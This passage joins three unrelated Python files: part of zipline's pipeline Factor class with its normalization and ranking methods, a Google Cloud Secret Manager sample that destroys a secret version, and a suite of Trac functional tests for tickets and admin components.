"{method_name}() is only defined on Factors of dtype {expected_dtype},"
" but it was called on a Factor of dtype {received_dtype}."
)
)
FACTOR_DTYPES = frozenset([datetime64ns_dtype, float64_dtype, int64_dtype])
class Factor(RestrictedDTypeMixin, ComputableTerm):
"""
Pipeline API expression producing a numerical or date-valued output.
Factors are the most commonly-used Pipeline term, representing the result
of any computation producing a numerical result.
Factors can be combined, both with other Factors and with scalar values,
via any of the builtin mathematical operators (``+``, ``-``, ``*``, etc).
This makes it easy to write complex expressions that combine multiple
Factors. For example, constructing a Factor that computes the average of
two other Factors is simply::
>>> f1 = SomeFactor(...)
>>> f2 = SomeOtherFactor(...)
>>> average = (f1 + f2) / 2.0
Factors can also be converted into :class:`zipline.pipeline.Filter` objects
via comparison operators: (``<``, ``<=``, ``!=``, ``eq``, ``>``, ``>=``).
There are many natural operators defined on Factors besides the basic
numerical operators. These include methods identifying missing or
extreme-valued outputs (isnull, notnull, isnan, notnan), methods for
normalizing outputs (rank, demean, zscore), and methods for constructing
Filters based on rank-order properties of results (top, bottom,
percentile_between).
"""
ALLOWED_DTYPES = FACTOR_DTYPES # Used by RestrictedDTypeMixin
# Dynamically add functions for creating NumExprFactor/NumExprFilter
# instances.
clsdict = locals()
clsdict.update(
{
method_name_for_op(op): binary_operator(op)
# Don't override __eq__ because it breaks comparisons on tuples of
# Factors.
for op in MATH_BINOPS.union(COMPARISONS - {'=='})
}
)
clsdict.update(
{
method_name_for_op(op, commute=True): reflected_binary_operator(op)
for op in MATH_BINOPS
}
)
clsdict.update(
{
unary_op_name(op): unary_operator(op)
for op in UNARY_OPS
}
)
clsdict.update(
{
funcname: function_application(funcname)
for funcname in NUMEXPR_MATH_FUNCS
}
)
__truediv__ = clsdict['__div__']
__rtruediv__ = clsdict['__rdiv__']
eq = binary_operator('==')
@expect_types(
mask=(Filter, NotSpecifiedType),
groupby=(Classifier, NotSpecifiedType),
)
@float64_only
def demean(self, mask=NotSpecified, groupby=NotSpecified):
"""
Construct a Factor that computes ``self`` and subtracts the mean from
row of the result.
If ``mask`` is supplied, ignore values where ``mask`` returns False
when computing row means, and output NaN anywhere the mask is False.
If ``groupby`` is supplied, compute by partitioning each row based on
the values produced by ``groupby``, de-meaning the partitioned arrays,
and stitching the sub-results back together.
Parameters
----------
mask : zipline.pipeline.Filter, optional
A Filter defining values to ignore when computing means.
groupby : zipline.pipeline.Classifier, optional
A classifier defining partitions over which to compute means.
Example
-------
Let ``f`` be a Factor which would produce the following output::
AAPL MSFT MCD BK
2017-03-13 1.0 2.0 3.0 4.0
2017-03-14 1.5 2.5 3.5 1.0
2017-03-15 2.0 3.0 4.0 1.5
2017-03-16 2.5 3.5 1.0 2.0
Let ``c`` be a Classifier producing the following output::
AAPL MSFT MCD BK
2017-03-13 1 1 2 2
2017-03-14 1 1 2 2
2017-03-15 1 1 2 2
2017-03-16 1 1 2 2
Let ``m`` be a Filter producing the following output::
AAPL MSFT MCD BK
2017-03-13 False True True True
2017-03-14 True False True True
2017-03-15 True True False True
2017-03-16 True True True False
Then ``f.demean()`` will subtract the mean from each row produced by
``f``.
::
AAPL MSFT MCD BK
2017-03-13 -1.500 -0.500 0.500 1.500
2017-03-14 -0.625 0.375 1.375 -1.125
2017-03-15 -0.625 0.375 1.375 -1.125
2017-03-16 0.250 1.250 -1.250 -0.250
``f.demean(mask=m)`` will subtract the mean from each row, but means
will be calculated ignoring values on the diagonal, and NaNs will
written to the diagonal in the output. Diagonal values are ignored
because they are the locations where the mask ``m`` produced False.
::
AAPL MSFT MCD BK
2017-03-13 NaN -1.000 0.000 1.000
2017-03-14 -0.500 NaN 1.500 -1.000
2017-03-15 -0.166 0.833 NaN -0.666
2017-03-16 0.166 1.166 -1.333 NaN
``f.demean(groupby=c)`` will subtract the group-mean of AAPL/MSFT and
MCD/BK from their respective entries. The AAPL/MSFT are grouped
together because both assets always produce 1 in the output of the
classifier ``c``. Similarly, MCD/BK are grouped together because they
always produce 2.
::
AAPL MSFT MCD BK
2017-03-13 -0.500 0.500 -0.500 0.500
2017-03-14 -0.500 0.500 1.250 -1.250
2017-03-15 -0.500 0.500 1.250 -1.250
2017-03-16 -0.500 0.500 -0.500 0.500
``f.demean(mask=m, groupby=c)`` will also subtract the group-mean of
AAPL/MSFT and MCD/BK, but means will be calculated ignoring values on
the diagonal , and NaNs will be written to the diagonal in the output.
::
AAPL MSFT MCD BK
2017-03-13 NaN 0.000 -0.500 0.500
2017-03-14 0.000 NaN 1.250 -1.250
2017-03-15 -0.500 0.500 NaN 0.000
2017-03-16 -0.500 0.500 0.000 NaN
Notes
-----
Mean is sensitive to the magnitudes of outliers. When working with
factor that can potentially produce large outliers, it is often useful
to use the ``mask`` parameter to discard values at the extremes of the
distribution::
>>> base = MyFactor(...)
>>> normalized = base.demean(mask=base.percentile_between(1, 99))
``demean()`` is only supported on Factors of dtype float64.
See Also
--------
:meth:`pandas.DataFrame.groupby`
"""
# This is a named function so that it has a __name__ for use in the
# graph repr of GroupedRowTransform.
def demean(row):
return row - nanmean(row)
return GroupedRowTransform(
transform=demean,
factor=self,
mask=mask,
groupby=groupby,
)
@expect_types(
mask=(Filter, NotSpecifiedType),
groupby=(Classifier, NotSpecifiedType),
)
@float64_only
def zscore(self, mask=NotSpecified, groupby=NotSpecified):
"""
Construct a Factor that Z-Scores each day's results.
The Z-Score of a row is defined as::
(row - row.mean()) / row.stddev()
If ``mask`` is supplied, ignore values where ``mask`` returns False
when computing row means and standard deviations, and output NaN
anywhere the mask is False.
If ``groupby`` is supplied, compute by partitioning each row based on
the values produced by ``groupby``, z-scoring the partitioned arrays,
and stitching the sub-results back together.
Parameters
----------
mask : zipline.pipeline.Filter, optional
A Filter defining values to ignore when Z-Scoring.
groupby : zipline.pipeline.Classifier, optional
A classifier defining partitions over which to compute Z-Scores.
Returns
-------
zscored : zipline.pipeline.Factor
A Factor producing that z-scores the output of self.
Notes
-----
Mean and standard deviation are sensitive to the magnitudes of
outliers. When working with factor that can potentially produce large
outliers, it is often useful to use the ``mask`` parameter to discard
values at the extremes of the distribution::
>>> base = MyFactor(...)
>>> normalized = base.zscore(mask=base.percentile_between(1, 99))
``zscore()`` is only supported on Factors of dtype float64.
Example
-------
See :meth:`~zipline.pipeline.factors.Factor.demean` for an in-depth
example of the semantics for ``mask`` and ``groupby``.
See Also
--------
:meth:`pandas.DataFrame.groupby`
"""
# This is a named function so that it has a __name__ for use in the
# graph repr of GroupedRowTransform.
def zscore(row):
return (row - nanmean(row)) / nanstd(row)
return GroupedRowTransform(
transform=zscore,
factor=self,
mask=mask,
groupby=groupby,
)
def rank(self, method='ordinal', ascending=True, mask=NotSpecified):
"""
Construct a new Factor representing the sorted rank of each column
within each row.
Parameters
----------
method : str, {'ordinal', 'min', 'max', 'dense', 'average'}
The method used to assign ranks to tied elements. See
`scipy.stats.rankdata` for a full description of the semantics for
each ranking method. Default is 'ordinal'.
ascending : bool, optional
Whether to return sorted rank in ascending or descending order.
Default is True.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when computing ranks.
If mask is supplied, ranks are computed ignoring any asset/date
pairs for which `mask` produces a value of False.
Returns
-------
ranks : zipline.pipeline.factors.Rank
A new factor that will compute the ranking of the data produced by
`self`.
Notes
-----
The default value for `method` is different from the default for
`scipy.stats.rankdata`. See that function's documentation for a full
description of the valid inputs to `method`.
Missing or non-existent data on a given day will cause an asset to be
given a rank of NaN for that day.
See Also
--------
:func:`scipy.stats.rankdata`
:class:`zipline.pipeline.factors.factor.Rank`
"""
return Rank(self, method=method, ascending=ascending, mask=mask)
@expect_types(bins=int, mask=(Filter, NotSpecifiedType))
def quantiles(self, bins, mask=NotSpecified):
"""
Construct a Classifier computing quantiles of the output of ``self``.
Every non-NaN data point the output is labelled with an integer value
from 0 to (bins - 1). NaNs are labelled with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
bins : int
Number of bins labels to compute.
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing quantiles.
Returns
-------
quantiles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to (bins - 1).
"""
if mask is NotSpecified:
mask = self.mask
return Quantiles(inputs=(self,), bins=bins, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def quartiles(self, mask=NotSpecified):
"""
Construct a Classifier computing quartiles over the output of ``self``.
Every non-NaN data point the output is labelled with a value of either
0, 1, 2, or 3, corresponding to the first, second, third, or fourth
quartile over each row. NaN data points are labelled with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing quartiles.
Returns
-------
quartiles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to 3.
"""
return self.quantiles(bins=4, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def quintiles(self, mask=NotSpecified):
"""
Construct a Classifier computing quintile labels on ``self``.
Every non-NaN data point the output is labelled with a value of either
0, 1, 2, or 3, 4, corresonding to quintiles over each row. NaN data
points are labelled with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing quintiles.
Returns
-------
quintiles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to 4.
"""
return self.quantiles(bins=5, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def deciles(self, mask=NotSpecified):
"""
Construct a Classifier computing decile labels on ``self``.
Every non-NaN data point the output is labelled with a value from 0 to
9 corresonding to deciles over each row. NaN data points are labelled
with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing deciles.
Returns
-------
deciles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to 9.
"""
return self.quantiles(bins=10, mask=mask)
def top(self, N, mask=NotSpecified):
"""
Construct a Filter matching the top N asset values of self each day.
Parameters
----------
N : int
Number of assets passing the returned filter each day.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when computing ranks.
If mask is supplied, top values are computed ignoring any
asset/date pairs for which `mask` produces a value of False.
Returns
-------
filter : zipline.pipeline.filters.Filter
"""
return self.rank(ascending=False, mask=mask) <= N
def bottom(self, N, mask=NotSpecified):
"""
Construct a Filter matching the bottom N asset values of self each day.
Parameters
----------
N : int
Number of assets passing the returned filter each day.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when computing ranks.
If mask is supplied, bottom values are computed ignoring any
asset/date pairs for which `mask` produces a value of False.
Returns
-------
filter : zipline.pipeline.Filter
"""
return self.rank(ascending=True, mask=mask) <= N
def percentile_between(self,
min_percentile,
max_percentile,
mask=NotSpecified):
"""
Construct a new Filter representing entries from the output of this
Factor that fall within the percentile range defined by min_percentile
and max_percentile.
Parameters
----------
min_percentile : float [0.0, 100.0]
Return True for assets falling above this percentile in the data.
max_percentile : float [0.0, 100.0]
Return True for assets falling below this percentile in the data.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when percentile
calculating thresholds. If mask is supplied, percentile cutoffs
are computed each day using only assets for which ``mask`` returns
True. Assets for which ``mask`` produces False will produce False
in the output of this Factor as well.
Returns
-------
out : zipline.pipeline.filters.PercentileFilter
A new filter that will compute the specified percentile-range mask.
See Also
--------
zipline.pipeline.filters.filter.PercentileFilter
"""
return PercentileFilter(
self,
min_percentile=min_percentile,
max_percentile=max_percentile,
mask=mask,
)
def isnull(self):
"""
A Filter producing True for values where this Factor has missing data.
Equivalent to self.isnan() when ``self.dtype`` is float64.
Otherwise equivalent to ``self.eq(self.missing_value)``.
Returns
-------
filter : zipline.pipeline.filters.Filter
"""
if self.dtype == float64_dtype:
# Using isnan is more efficient when possible because we can fold
# the isnan computation with other NumExpr expressions.
return self.isnan()
else:
return NullFilter(self)
def notnull(self):
"""
A Filter producing True for values where this Factor has complete data.
Equivalent to ``~self.isnan()` when ``self.dtype`` is float64.
Otherwise equivalent to ``(self != self.missing_value)``.
"""
return ~self.isnull()
@if_not_float64_tell_caller_to_use_isnull
def isnan(self):
"""
A Filter producing True for all values where this Factor is NaN.
Returns
-------
nanfilter : zipline.pipeline.filters.Filter
"""
return self != self
@if_not_float64_tell_caller_to_use_isnull
def notnan(self):
"""
A Filter producing True for values where this Factor is not NaN.
Returns
-------
nanfilter : zipline.pipeline.filters.Filter
"""
return ~self.isnan()
@if_not_float64_tell_caller_to_use_isnull
def isfinite(self):
"""
A Filter producing True for values where this Factor is anything but
NaN, inf, or -inf.
"""
return (-inf < self) & (self < inf)
class NumExprFactor(NumericalExpression, Factor):
"""
Factor computed from a numexpr expression.
Parameters
----------
expr : string
A string suitable for passing to numexpr. All variables in 'expr'
should be of the form "x_i", where i is the index of the corresponding
factor input in 'binds'.
binds : tuple
A tuple of factors to use as inputs.
Notes
-----
NumExprFactors are constructed by numerical operators like `+` and `-`.
Users should rarely need to construct a NumExprFactor directly.
"""
pass
class GroupedRowTransform(Factor):
"""
A Factor that transforms an input factor by applying a row-wise
shape-preserving transformation on classifier-defined groups of that
Factor.
This is most often useful for normalization operators like ``zscore`` or
``demean``.
Parameters
----------
transform : function[ndarray[ndim=1] -> ndarray[ndim=1]]
Function to apply over each row group.
factor : zipline.pipeline.Factor
The factor providing baseline data to transform.
mask : zipline.pipeline.Filter
Mask of entries to ignore when calculating transforms.
groupby : zipline.pipeline.Classifier
Classifier partitioning ``factor`` into groups to use when calculating
means.
Notes
-----
Users should rarely construct instances of this factor directly. Instead,
they should construct instances via factor normalization methods like
``zscore`` and ``demean``.
See Also
--------
zipline.pipeline.factors.Factor.zscore
zipline.pipeline.factors.Factor.demean
"""
window_length = 0
def __new__(cls, transform, factor, mask, groupby):
if mask is NotSpecified:
mask = factor.mask
else:
mask = mask & factor.mask
if groupby is NotSpecified:
groupby = Everything(mask=mask)
return super(GroupedRowTransform, cls).__new__(
GroupedRowTransform,
transform=transform,
inputs=(factor, groupby),
missing_value=factor.missing_value,
mask=mask,
dtype=factor.dtype,
)
def _init(self, transform, *args, **kwargs):
self._transform = transform
return super(GroupedRowTransform, self)._init(*args, **kwargs)
@classmethod
def static_identity(cls, transform, *args, **kwargs):
return (
super(GroupedRowTransform, cls).static_identity(*args, **kwargs),
transform,
)
def _compute(self, arrays, dates, assets, mask):
data = arrays[0]
null_group_value = self.inputs[1].missing_value
group_labels = where(
mask,
arrays[1],
null_group_value,
)
return where(
group_labels != null_group_value,
naive_grouped_rowwise_apply(
data=data,
group_labels=group_labels,
func=self._transform,
),
self.missing_value,
)
@property
def transform_name(self):
return self._transform.__name__
def short_repr(self):
return type(self).__name__ + '(%r)' % self.transform_name
class Rank(SingleInputMixin, Factor):
"""
A Factor representing the row-wise rank data of another Factor.
Parameters
----------
factor : zipline.pipeline.factors.Factor
The factor on which to compute ranks.
method : str, {'average', 'min', 'max', 'dense', 'ordinal'}
The method used to assign ranks to tied elements. See
`scipy.stats.rankdata` for a full description of the semantics for each
ranking method.
See Also
--------
:func:`scipy.stats.rankdata`
:class:`Factor.rank`
Notes
-----
Most users should call Factor.rank rather than directly construct an
instance of this class.
"""
window_length = 0
dtype = float64_dtype
def __new__(cls, factor, method, ascending, mask):
return super(Rank, cls).__new__(
cls,
inputs=(factor,),
method=method,
ascending=ascending,
mask=mask,
)
def _init(self, method, ascending, *args, **kwargs):
self._method = method
self._ascending = ascending
return super(Rank, self)._init(*args, **kwargs)
@classmethod
def static_identity(cls, method, ascending, *args, **kwargs):
return (
super(Rank, cls).static_identity(*args, **kwargs),
method,
ascending,
)
def _validate(self):
"""
Verify that the stored rank method is valid.
"""
if self._method not in _RANK_METHODS:
raise UnknownRankMethod(
method=self._method,
choices=set(_RANK_METHODS),
)
return super(Rank, self)._validate()
def _compute(self, arrays, dates, assets, mask):
"""
For each row in the input, compute a like-shaped array of per-row
ranks.
"""
return masked_rankdata_2d(
arrays[0],
mask,
self.inputs[0].missing_value,
self._method,
self._ascending,
)
def __repr__(self):
return "{type}({input_}, method='{method}', mask={mask})".format(
type=type(self).__name__,
input_=self.inputs[0],
method=self._method,
mask=self.mask,
)
class CustomFactor(PositiveWindowLengthMixin, CustomTermMixin, Factor):
'''
Base class for user-defined Factors.
Parameters
----------
inputs : iterable, optional
An iterable of `BoundColumn` instances (e.g. USEquityPricing.close),
describing the data to load and pass to `self.compute`. If this
argument is passed to the CustomFactor constructor, we look for a
class-level attribute named `inputs`.
window_length : int, optional
Number of rows to pass for each input. If this argument is not passed
to the CustomFactor constructor, we look for a class-level attribute
named `window_length`.
mask : zipline.pipeline.Filter, optional
A Filter describing the assets on which we should compute each day.
Each call to ``CustomFactor.compute`` will only receive assets for
which ``mask`` produced True on the day for which compute is being
called.
Notes
-----
Users implementing their own Factors should subclass CustomFactor and
implement a method named `compute` with the following signature:
.. code-block:: python
def compute(self, today, assets, out, *inputs):
...
On each simulation date, ``compute`` will be called with the current date,
an array of sids, an output array, and an input array for each expression
passed as inputs to the CustomFactor constructor.
The specific types of the values passed to `compute` are as follows::
today : np.datetime64[ns]
Row label for the last row of all arrays passed as `inputs`.
assets : np.array[int64, ndim=1]
Column labels for `out` and`inputs`.
out : np.array[self.dtype, ndim=1]
Output array of the same shape as `assets`. `compute` should write
its desired return values into `out`.
*inputs : tuple of np.array
Raw data arrays corresponding to the values of `self.inputs`.
``compute`` functions should expect to be passed NaN values for dates on
which no data was available for an asset. This may include dates on which
an asset did not yet exist.
For example, if a CustomFactor requires 10 rows of close price data, and
asset A started trading on Monday June 2nd, 2014, then on Tuesday, June
3rd, 2014, the column of input data for asset A will have 9 leading NaNs
for the preceding days on which data was not yet available.
Examples
--------
A CustomFactor with pre-declared defaults:
.. code-block:: python
class TenDayRange(CustomFactor):
"""
Computes the difference between the highest high in the last 10
days and the lowest low.
Pre-declares high and low as default inputs and `window_length` as
10.
"""
inputs = [USEquityPricing.high, USEquityPricing.low]
window_length = 10
def compute(self, today, assets, out, highs, lows):
from numpy import nanmin, nanmax
highest_highs = nanmax(highs, axis=0)
lowest_lows = nanmin(lows, axis=0)
out[:] = highest_highs - lowest_lows
# Doesn't require passing inputs or window_length because they're
# pre-declared as defaults for the TenDayRange class.
ten_day_range = TenDayRange()
A CustomFactor without defaults:
.. code-block:: python
class MedianValue(CustomFactor):
"""
Computes the median value of an arbitrary single input over an
arbitrary window..
Does not declare any defaults, so values for `window_length` and
`inputs` must be passed explicitly on every construction.
"""
def compute(self, today, assets, out, data):
from numpy import nanmedian
out[:] = data.nanmedian(data, axis=0)
# Values for `inputs` and `window_length` must be passed explicitly to
# MedianValue.
median_close10 = MedianValue([USEquityPricing.close], window_length=10)
median_low15 = MedianValue([USEquityPricing.low], window_length=15)
'''
dtype = float64_dtype
class Latest(LatestMixin, CustomFactor):
"""
Factor producing the most recently-known value of `inputs[0]` on each day.
The `.latest` attribute of DataSet columns returns an instance of this
Factor.
"""
window_length = 1
def compute(self, today, assets, out, data):
out[:] = data[-1]
|
#!/usr/bin/env python
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
"""
command line application and sample code for destroying a secret verison.
"""
import argparse
# [START secretmanager_destroy_secret_version]
def destroy_secret_version(project_id, secret_id, version_id):
"""
Destroy the given secret version, making the payload irrecoverable. Other
secrets versions are unaffected.
"""
# Import the Secret Manager client library.
from google.cloud import secretmanager_v1beta1 as secretmanager
# Create the Secret Manager client.
client = secretmanager.SecretManagerServiceClient()
# Build the resource name of the secret version
name = client.secret_version_path(project_id, secret_id, version_id)
# Destroy the secret version.
response = client.destroy_secret_version(name)
print('Destroyed secret version: {}'.format(response.name))
# [END secretmanager_destroy_secret_version]
return response
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('project_id', help='id of the GCP project')
parser.add_argument('secret_id', help='id of the secret from which to act')
parser.add_argument('version_id', help='id of the version to destroy')
args = parser.parse_args()
destroy_secret_version(args.project_id, args.secret_id, args.version_id)
|
#!/usr/bin/python
import os
import re
from datetime import datetime, timedelta
from trac.tests.functional import *
from trac.util.datefmt import utc, localtz, format_date
class TestTickets(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Create a ticket, comment on it, and attach a file"""
# TODO: this should be split into multiple tests
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.create_ticket()
self._tester.add_comment(ticketid)
self._tester.attach_file_to_ticket(ticketid)
class TestTicketPreview(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Preview ticket creation"""
self._tester.go_to_front()
tc.follow('New Ticket')
summary = random_sentence(5)
desc = random_sentence(5)
tc.formvalue('propertyform', 'field-summary', summary)
tc.formvalue('propertyform', 'field-description', desc)
tc.submit('preview')
tc.url(self._tester.url + '/newticket$')
tc.find('ticket not yet created')
tc.find(summary)
tc.find(desc)
class TestTicketNoSummary(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Creating a ticket without summary should fail"""
self._tester.go_to_front()
tc.follow('New Ticket')
desc = random_sentence(5)
tc.formvalue('propertyform', 'field-description', desc)
tc.submit('submit')
tc.find(desc)
tc.find('Tickets must contain a summary.')
tc.find('Create New Ticket')
tc.find('ticket not yet created')
class TestTicketAltFormats(FunctionalTestCaseSetup):
def runTest(self):
"""Download ticket in alternative formats"""
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_ticket(ticketid)
for format in ['Comma-delimited Text', 'Tab-delimited Text',
'RSS Feed']:
tc.follow(format)
content = b.get_html()
if content.find(summary) < 0:
raise AssertionError('Summary missing from %s format' % format)
tc.back()
class TestTicketCSVFormat(FunctionalTestCaseSetup):
def runTest(self):
"""Download ticket in CSV format"""
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_ticket(ticketid)
tc.follow('Comma-delimited Text')
csv = b.get_html()
if not csv.startswith('id,summary,'):
raise AssertionError('Bad CSV format')
class TestTicketTabFormat(FunctionalTestCaseSetup):
def runTest(self):
"""Download ticket in Tab-delimitted format"""
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_ticket(ticketid)
tc.follow('Tab-delimited Text')
tab = b.get_html()
if not tab.startswith('id\tsummary\t'):
raise AssertionError('Bad tab delimitted format')
class TestTicketRSSFormat(FunctionalTestCaseSetup):
def runTest(self):
"""Download ticket in RSS format"""
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_ticket(ticketid)
# Make a number of changes to exercise all of the RSS feed code
self._tester.go_to_ticket(ticketid)
tc.formvalue('propertyform', 'comment', random_sentence(3))
tc.formvalue('propertyform', 'field-type', 'task')
tc.formvalue('propertyform', 'description', summary + '\n\n' +
random_sentence(8))
tc.formvalue('propertyform', 'field-keywords', 'key')
tc.submit('submit')
time.sleep(1) # Have to wait a second
tc.formvalue('propertyform', 'field-keywords', '')
tc.submit('submit')
tc.find('RSS Feed')
tc.follow('RSS Feed')
rss = b.get_html()
if not rss.startswith('<?xml version="1.0"?>'):
raise AssertionError('RSS Feed not valid feed')
class TestTicketSearch(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket search"""
summary = random_sentence(4)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_front()
tc.follow('Search')
tc.formvalue('fullsearch', 'ticket', True)
tc.formvalue('fullsearch', 'q', summary)
tc.submit('Search')
tc.find('class="searchable">.*' + summary)
tc.notfind('No matches found')
class TestNonTicketSearch(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test non-ticket search"""
# Create a summary containing only unique words
summary = ' '.join([random_word() + '_TestNonTicketSearch'
for i in range(5)])
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_front()
tc.follow('Search')
tc.formvalue('fullsearch', 'ticket', False)
tc.formvalue('fullsearch', 'q', summary)
tc.submit('Search')
tc.notfind('class="searchable">' + summary)
tc.find('No matches found')
class TestTicketHistory(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket history"""
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
comment = random_sentence(5)
self._tester.add_comment(ticketid, comment=comment)
self._tester.go_to_ticket(ticketid)
url = b.get_url()
tc.go(url + '?version=0')
tc.find('at <[^>]*>*Initial Version')
tc.find(summary)
tc.notfind(comment)
tc.go(url + '?version=1')
tc.find('at <[^>]*>*Version 1')
tc.find(summary)
tc.find(comment)
class TestTicketHistoryDiff(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket history (diff)"""
name = 'TestTicketHistoryDiff'
ticketid = self._tester.create_ticket(name)
self._tester.go_to_ticket(ticketid)
tc.formvalue('propertyform', 'description', random_sentence(6))
tc.submit('submit')
tc.find('Description<[^>]*>\\s*modified \\(<[^>]*>diff', 's')
tc.follow('diff')
tc.find('Changes\\s*between\\s*<[^>]*>Initial Version<[^>]*>\\s*and' \
'\\s*<[^>]*>Version 1<[^>]*>\\s*of\\s*<[^>]*>Ticket #' , 's')
class TestTicketQueryLinks(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket query links"""
count = 3
ticket_ids = [self._tester.create_ticket(
summary='TestTicketQueryLinks%s' % i)
for i in range(count)]
self._tester.go_to_query()
# We don't have the luxury of javascript, so this is a multi-step
# process
tc.formvalue('query', 'add_filter_0', 'summary')
tc.submit('add_0')
tc.formvalue('query', '0_owner', 'nothing')
tc.submit('rm_filter_0_owner_0')
tc.formvalue('query', '0_summary', 'TestTicketQueryLinks')
tc.submit('update')
query_url = b.get_url()
for i in range(count):
tc.find('TestTicketQueryLinks%s' % i)
tc.follow('TestTicketQueryLinks0')
tc.find('class="missing">← Previous Ticket')
tc.find('title="Ticket #%s">Next Ticket' % ticket_ids[1])
tc.follow('Back to Query')
tc.url(re.escape(query_url))
tc.follow('TestTicketQueryLinks1')
tc.find('title="Ticket #%s">Previous Ticket' % ticket_ids[0])
tc.find('title="Ticket #%s">Next Ticket' % ticket_ids[2])
tc.follow('Next Ticket')
tc.find('title="Ticket #%s">Previous Ticket' % ticket_ids[1])
tc.find('class="missing">Next Ticket →')
class TestTicketQueryOrClause(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket query with an or clauses"""
count = 3
ticket_ids = [self._tester.create_ticket(
summary='TestTicketQueryOrClause%s' % i,
info={'keywords': str(i)})
for i in range(count)]
self._tester.go_to_query()
tc.formvalue('query', '0_owner', '')
tc.submit('rm_filter_0_owner_0')
tc.formvalue('query', 'add_filter_0', 'summary')
tc.submit('add_0')
tc.formvalue('query', '0_summary', 'TestTicketQueryOrClause1')
tc.formvalue('query', 'add_clause_1', 'keywords')
tc.submit('add_1')
tc.formvalue('query', '1_keywords', '2')
tc.submit('update')
tc.notfind('TestTicketQueryOrClause0')
for i in [1, 2]:
tc.find('TestTicketQueryOrClause%s' % i)
class TestTimelineTicketDetails(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket details on timeline"""
env = self._testenv.get_trac_environment()
env.config.set('timeline', 'ticket_show_details', 'yes')
env.config.save()
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_ticket(ticketid)
self._tester.add_comment(ticketid)
self._tester.go_to_timeline()
tc.formvalue('prefs', 'ticket_details', True)
tc.submit()
htmltags = '(<[^>]*>)*'
tc.find('Ticket ' + htmltags + '#' + str(ticketid) + htmltags + ' \\(' +
summary + '\\) updated\\s+by\\s+' + htmltags + 'admin', 's')
class TestAdminComponent(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create component"""
self._tester.create_component()
class TestAdminComponentDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate component"""
name = "DuplicateMilestone"
self._tester.create_component(name)
component_url = self._tester.url + "/admin/ticket/components"
tc.go(component_url)
tc.formvalue('addcomponent', 'name', name)
tc.submit()
tc.notfind(internal_error)
tc.find('Component .* already exists')
class TestAdminComponentRemoval(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove component"""
name = "RemovalComponent"
self._tester.create_component(name)
component_url = self._tester.url + "/admin/ticket/components"
tc.go(component_url)
tc.formvalue('component_table', 'sel', name)
tc.submit('remove')
tc.notfind(name)
class TestAdminComponentNonRemoval(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove no selected component"""
component_url = self._tester.url + "/admin/ticket/components"
tc.go(component_url)
tc.formvalue('component_table', 'remove', 'Remove selected items')
tc.submit('remove')
tc.find('No component selected')
class TestAdminComponentDefault(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin set default component"""
name = "DefaultComponent"
self._tester.create_component(name)
component_url = self._tester.url + "/admin/ticket/components"
tc.go(component_url)
tc.formvalue('component_table', 'default', name)
tc.submit('apply')
tc.find('type="radio" name="default" value="%s" checked="checked"' % \
name)
tc.go(self._tester.url + '/newticket')
tc.find('<option selected="selected" value="%s">%s</option>'
% (name, name))
class TestAdminComponentDetail(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin component detail"""
name = "DetailComponent"
self._tester.create_component(name)
component_url = self._tester.url + "/admin/ticket/components"
tc.go(component_url)
tc.follow(name)
desc = 'Some component description'
tc.formvalue('modcomp', 'description', desc)
tc.submit('cancel')
tc.url(component_url + '$')
